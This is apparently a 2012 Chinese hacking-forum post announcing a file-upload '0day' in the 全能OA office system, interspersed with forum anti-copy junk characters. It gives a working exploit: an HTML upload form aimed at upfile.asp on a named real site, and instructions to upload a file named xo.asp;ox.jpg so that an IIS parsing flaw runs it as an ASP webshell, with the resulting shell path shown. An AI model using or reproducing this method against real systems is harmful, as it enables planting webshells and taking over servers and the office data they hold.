找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2196|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
! [9 \' t" x. \/ S! f/ D# T
, a2 P& n. B4 a8 Q/ y系统介绍:7 x* W/ [2 T/ p4 M' r
2 O% `3 |" F8 s& ?7 Q
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
& V8 _, X3 W0 h# e% U7 z/ L
7 E7 E# X. @1 C6 h: @主要功能:
5 X/ B' a" f+ Y6 i9 R" `5 ]公司通告 + J! J0 H5 o  ^% ]" A
工作计划
/ p1 n" y' p( v/ I. `通讯助理 ( ^0 V& V6 @# l
客户资源
* f7 y. R1 Q" v7 \我的公文 & p0 ]  p' T! u" z
公文传阅 $ s- Q) J3 X2 U4 |; H& U3 A
公共资源
( j+ Z4 L9 j3 Y9 B  q资源预约 3 {  N; d' I5 b7 k+ u, _/ g
今日考勤 5 c5 k+ `, O" k8 ?. ~* D. ^
个人计划
* H! z8 G9 O: D个人通讯录 5 t" y$ s. J: U! G3 b: l, c
个人基本档案 4 D+ H5 b2 \! F! p6 ~0 r7 {  j
未读邮件
9 m. T% B+ }! T/ n6 T/ H发邮件 * O2 I$ {0 x% e
收件夹
% x' v9 m: n2 U: N2 F" z寄件夹
4 H. _: C0 A6 V. A( ]  U网络硬盘
% h3 g% M8 s& o; {* O网络会议
& F  g$ l$ k/ b+ p9 a网络调查
2 e/ a1 @+ M9 c/ j; E/ J3 t交流论坛
5 {$ j- S* J/ I+ a1 T
& c: F; A2 H- m4 t4 M有兴趣测试的朋友可以下源码看看" c" `1 h- g6 W2 {

; V- ^8 D2 q/ K8 N+ d8 \源码下载:% t. R. A% i  F
* ^. N2 @5 E7 @7 A4 i: i4 r4 R' j9 I, Q
http://www.mycodes.net/30/4750.htm
# Z8 W# z$ g; }7 K/ Q2 V
2 T/ L9 {# _' U0 X% p3 P0 j/ S漏洞介绍:
2 l* F9 m: k! P% S# r' o1 A- {# r% n
0 a1 C" w) |) X- F0 T( B9 ^由upfile.asp上传文件漏洞引起1 D$ S/ W/ ?1 _' N* s" |/ s
/ q5 t! m4 i. G/ H2 D# B2 U
测试方法:
) b' z9 `! n% W% z
6 p. I/ G1 u/ l6 M7 u6 a使用名小子上传http://www.itlynn.com/upfile.asp即可/ {1 @+ M% J. Q: o5 U
) P/ f0 s0 p/ I& G0 o
如果upfile.asp文件被删除不存在。2 O7 ~$ a8 d$ v$ k* O) X/ a9 L1 N
$ [1 A$ T* {/ q1 \" C
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
6 [7 q$ `- \! ~# s. N- f( {8 Z( b0 ?
如果存在那么将如下代码保存为upfile.html。
; c/ ]! a( C+ F: {7 N  R/ T0 \6 I: R  e2 X; @% e% k9 t
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
/ w- e- }- x, [& ?3 v: k7 _& p8 f: G& _" t
( r* l7 \0 o  O; \  j
( ?8 k6 T! G0 ^
01 <table border='0' align="center" cellpadding="5">
- |) r8 M3 F$ ]2 W
& B5 f; L5 ?5 F# L& A5 j- u7 x02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
- a7 n, S" l/ O
1 J$ F; `1 Y8 X03 <tr>
# e  c0 d! i& P" R$ o4 u3 R- Z* L6 ~
04             <td>报错:</td>
, Z! ~* D5 L( L0 H' P/ c- D
6 \6 M; Y, L( {' h" i  `05             <td><input type='radio' name='errnumber' value='0'> * r  D2 F1 J- W. i9 ~

. x& o+ \! r2 r1 n06               自动更名 1 K9 A  ?0 y1 E7 _9 J  _
6 f- c$ u7 N% h( P9 P1 W
07               <input type='radio' name='errnumber' value='1' checked> ! i$ E2 b$ v7 }
; Y" V7 f% g5 _
08               报错方式
. U2 J# N# f/ T1 [6 P  O8 s% x  M) T" @$ p/ {
09               <input type='radio' name='errnumber' value='2'> , f4 @& u) H3 Q1 y# A
4 z% N8 v, F+ g
10               直接覆盖</td>
6 b9 x) {& {' c0 m1 ^0 y' r) a
* A7 K" V2 p% g: A$ Z11           </tr>
, ^* M- R7 Y# I) C! H& P4 A5 W1 s  @! u4 q/ X
12           <tr>
1 t5 z8 @, z  t( d! h; |; [; t/ [+ e" ~5 k" y% y
13             <td>主题:</td> 1 D9 E! H/ A8 G) [/ r  |+ b
" W: Y3 g8 |6 f1 D2 ~% C7 C
14             <td><input type='text' name='filename' size='30'></td> " L. X! k: n! _* e1 r4 p( n* o/ s

' v- z* ]! E# t% n15           </tr>
- h; C2 E7 U4 y  S) H3 g9 d' _$ ^( o0 L! o/ `( b0 _" W7 R3 q
16           <tr>
. b9 F: M. _- [0 h" Y/ B0 P' ]9 _$ ^' h9 g" N
17             <td>文件:</td> ) Y; {$ C2 ?( h9 a

" i4 g8 [; W" x18             <td><input type="file"name="fruit"size="30"></td>
' o# k1 R3 J2 w  [$ f  \, ]4 ]: w# k: o$ y2 b% D: ]: q2 j
19           </tr> 2 f! ^- a% d5 t
" t; h3 M: }1 a0 F. B/ G- J
20           <tr>
/ ?" D' M- M! }6 C& N3 M) E" r
4 u) ?0 J* V" c7 i21             <td valign='top'>简介:</td> * w9 ~+ \+ G5 Z% e& z) B% B6 L
6 F/ t. f' c2 G2 J: o9 i
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
) u/ Q  j) |9 T. |; O1 M0 S2 \
% `. ]+ F- h+ a/ p' \- l6 Z23           </tr>
2 }2 k$ w: O  c/ q
% {- G) @7 i5 D) P6 l) c; X2 Y24   0 N; |/ _' d/ p8 q
6 A) j" X. L* @8 k0 N, e2 {: g
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> * e, i; L! B3 I, D9 {
# ]$ K! M+ A5 L9 p, y1 B
26           </tr> 2 K& @0 R! ^4 J  _+ @

0 T' v  e/ j4 G27         </form>
1 H4 T2 N; f- E8 z- t, g
: Q/ Q9 v% y5 v3 S! X然后打开上传一个文件名为xo.asp;ox.jpg的文件。  g* J8 V$ `9 ?5 w9 V

/ P/ l- ]9 N5 I- o6 m: Y
# x1 v2 A- r5 I- l  `. \0 N3 ^$ \8 [' C
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
+ t5 p2 p+ V( R: L; U. C
7 b+ X" E0 b; l此漏洞需要配合解析漏洞利用。
- j) k) b4 w4 i/ T1 p& k: I$ U* u. q0 Z+ ?, B6 J% C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表